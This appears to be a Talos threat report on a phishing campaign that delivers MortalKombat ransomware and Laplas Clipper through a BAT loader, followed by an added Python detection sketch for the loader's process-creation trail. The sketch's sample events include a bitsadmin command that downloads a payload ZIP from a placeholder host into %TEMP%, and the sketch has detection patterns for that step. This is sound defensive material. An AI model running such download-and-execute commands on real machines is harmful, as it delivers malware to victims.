- Since December 2022, Cisco Talos has been observing an unidentified actor deploying two relatively new threats, the recently discovered MortalKombat ransomware and a GO variant of the Laplas Clipper malware, to steal cryptocurrency from victims.
- Talos observed the actor scanning the internet for victim machines with an exposed remote desktop protocol (RDP) port 3389, using one of their download servers that runs an RDP crawler and also facilitates MortalKombat ransomware.
- Based on Talos’ analysis of similarities in code, class name, and registry key strings, we assess with high confidence that the MortalKombat ransomware belongs to the Xorist family.
- Talos continues to see attack campaigns targeting individuals, small businesses, and large organizations that aim to steal or demand ransom payments in cryptocurrency.
- Leveraging cryptocurrency offers threat actors attractive benefits such as anonymity, decentralization, and lack of regulation, making it more challenging to track.
- Talos recommends that users and organizations be meticulous about the recipient’s wallet address while performing cryptocurrency transactions.
- Talos encourages updating computers with the latest security updates, implementing robust endpoint protection solutions with behavioral detection capabilities, and maintaining tested, offline backup solutions for endpoints with a reasonable restoration time in the event of a ransomware attack.

Multi-stage attack chain delivers malware or ransomware and removes infection markers

A typical infection in this campaign begins with a phishing email and kicks off a multi-stage attack chain in which the actor delivers either malware or ransomware, then deletes evidence of malicious files, covering their tracks and challenging analysis.

The malicious ZIP file attached to the initial phishing email contains a BAT loader script. When a victim opens the loader script, it downloads another malicious ZIP file from an attacker-controlled hosting server to the victim’s machine, inflates it automatically, and executes the payload, which is either the GO variant of Laplas Clipper malware or MortalKombat ransomware. The loader script will run the dropped payload as a process in the victim’s machine, then delete the downloaded and dropped malicious files to clean up the infection markers.

Infection summary flow diagram.

Cryptocurrency-themed email lure used as initial infection vector

The initial infection vector is a phishing email in which the attackers impersonate CoinPayments, a legitimate global cryptocurrency payment gateway. Additionally, the emails have a spoofed sender email, “noreply[at]CoinPayments[.]net”, and the email subject “[CoinPayments.net] Payment Timed Out.” A malicious ZIP file is attached with a filename resembling a transaction ID mentioned in the email body, enticing the recipient to unzip the malicious attachment and view the contents, which is a malicious BAT loader.

BAT loader used to deploy Laplas Clipper malware and MortalKombat ransomware

Talos observed different attacks in this campaign where the actor used the BAT loader script to download and execute either Laplas Clipper malware or MortalKombat ransomware. The BAT loader script uses the living-off-the-land binary (LoLBin) bitsadmin to download a malicious ZIP file from the attacker-controlled download server to the victim machine’s local user applications temporary folder. Using an embedded VB script, the BAT loader script inflates the downloaded malicious ZIP in the “%TEMP%” location and drops a malicious executable file with double file extensions “.PDF.EXE”. The BAT loader script starts the dropped malware using the Windows start command and deletes the downloaded ZIP file and the dropped payload.

BAT loader downloading and executing MortalKombat ransomware.

BAT loader downloading and executing Laplas Clipper malware.

MortalKombat and Laplas Clipper payloads deployed to elicit cryptocurrency gains

Talos observed the threat actor deploying MortalKombat ransomware and Laplas Clipper malware in this campaign, both used to steal cryptocurrency from the victim. MortalKombat is a novel ransomware, first observed by threat researchers in January 2023, with little known about its developers and operating model. The name of the ransomware and the wallpaper it drops on the victim system are almost certainly a reference to the Mortal Kombat media franchise, which encompasses a series of popular video games and films.

Talos observed that MortalKombat encrypts various files on the victim machine’s filesystem, such as system, application, database, backup, and virtual machine files, as well as files on the remote locations mapped as logical drives in the victim’s machine. It drops the ransom note and changes the victim machine’s wallpaper upon the encryption process. MortalKombat did not show any wiper behavior or delete the volume shadow copies on the victim’s machine.
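The BAT loader chain described in this report (bitsadmin pulling a ZIP into the user's temporary folder, a script host inflating it, and a double-extension “.PDF.EXE” payload launched from %TEMP%) leaves a recognisable sequence in process-creation telemetry. The following detection sketch is an added example, not Talos code and not tied to any indicator from the report: it assumes a simplified `time|parent_image|image|command_line` event format, and every host name, path and download server in the sample events is a constructed placeholder.

```python
"""Detection sketch for the BAT-loader behaviour described in the report.

Assumed, simplified process-creation event format (one event per line):
    <time>|<parent_image>|<image>|<command_line>
"""
import re
from dataclasses import dataclass

# Constructed sample events. Paths, user name and the download host are
# placeholders, not indicators taken from the Talos report.
SAMPLE_EVENTS = r"""
2023-01-10T09:14:02Z|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe /c C:\Users\alice\Downloads\txn-0000.bat
2023-01-10T09:14:03Z|C:\Windows\System32\cmd.exe|C:\Windows\System32\bitsadmin.exe|bitsadmin /transfer job /download /priority high http://download.example.invalid/payload.zip C:\Users\alice\AppData\Local\Temp\payload.zip
2023-01-10T09:14:05Z|C:\Windows\System32\cmd.exe|C:\Windows\System32\wscript.exe|wscript.exe C:\Users\alice\AppData\Local\Temp\unzip.vbs
2023-01-10T09:14:07Z|C:\Windows\System32\cmd.exe|C:\Users\alice\AppData\Local\Temp\invoice.PDF.EXE|C:\Users\alice\AppData\Local\Temp\invoice.PDF.EXE
2023-01-10T10:00:00Z|C:\Windows\explorer.exe|C:\Program Files\Acme\acme.exe|C:\Program Files\Acme\acme.exe /report.pdf
2023-01-10T10:05:00Z|C:\Windows\System32\svchost.exe|C:\Windows\System32\bitsadmin.exe|bitsadmin /list
"""

# Document-style extension followed by .exe, e.g. invoice.PDF.EXE
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)\.exe$", re.I)
# The per-user temporary folder the loader writes to (%TEMP%)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
# bitsadmin switches that create or perform a transfer; "/list" alone is benign
BITS_TRANSFER = re.compile(r"/(transfer|addfile|create)\b", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


@dataclass
class Alert:
    rule: str
    time: str
    image: str


def parse_events(text):
    """Yield one dict per non-empty event line."""
    for line in text.splitlines():
        if not line.strip():
            continue
        time, parent, image, cmd = line.split("|", 3)
        yield {"time": time, "parent": parent, "image": image, "cmd": cmd}


def detect(text):
    """Run the three loader-stage rules over the events and return alerts."""
    alerts = []
    for ev in parse_events(text):
        base = ev["image"].rsplit("\\", 1)[-1].lower()
        # Stage 1: bitsadmin used as a downloader into %TEMP%
        if base == "bitsadmin.exe" and BITS_TRANSFER.search(ev["cmd"]) \
                and TEMP_DIR.search(ev["cmd"]):
            alerts.append(Alert("bitsadmin_download_to_temp", ev["time"], ev["image"]))
        # Stage 2: a script host executing a script dropped in %TEMP%
        if base in SCRIPT_HOSTS and TEMP_DIR.search(ev["cmd"]):
            alerts.append(Alert("script_host_from_temp", ev["time"], ev["image"]))
        # Stage 3: a double-extension executable started from %TEMP%
        if DOUBLE_EXT.search(ev["image"]) and TEMP_DIR.search(ev["image"]):
            alerts.append(Alert("double_extension_exe_from_temp", ev["time"], ev["image"]))
    return alerts


def loader_chain_seen(alerts):
    """True when both the download stage and the payload launch were observed."""
    rules = {a.rule for a in alerts}
    return {"bitsadmin_download_to_temp", "double_extension_exe_from_temp"} <= rules


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for a in found:
        print(f"{a.time}  {a.rule:32}  {a.image}")
    print("loader chain seen:", loader_chain_seen(found))
```

The individual rules are deliberately narrow (bitsadmin only fires on transfer switches with a %TEMP% destination, so routine `bitsadmin /list` calls stay quiet), and the chain check is what turns three medium-confidence hits into one high-confidence alert; because the loader deletes the ZIP and the payload after launch, process-creation telemetry like this is often the only artifact left to correlate.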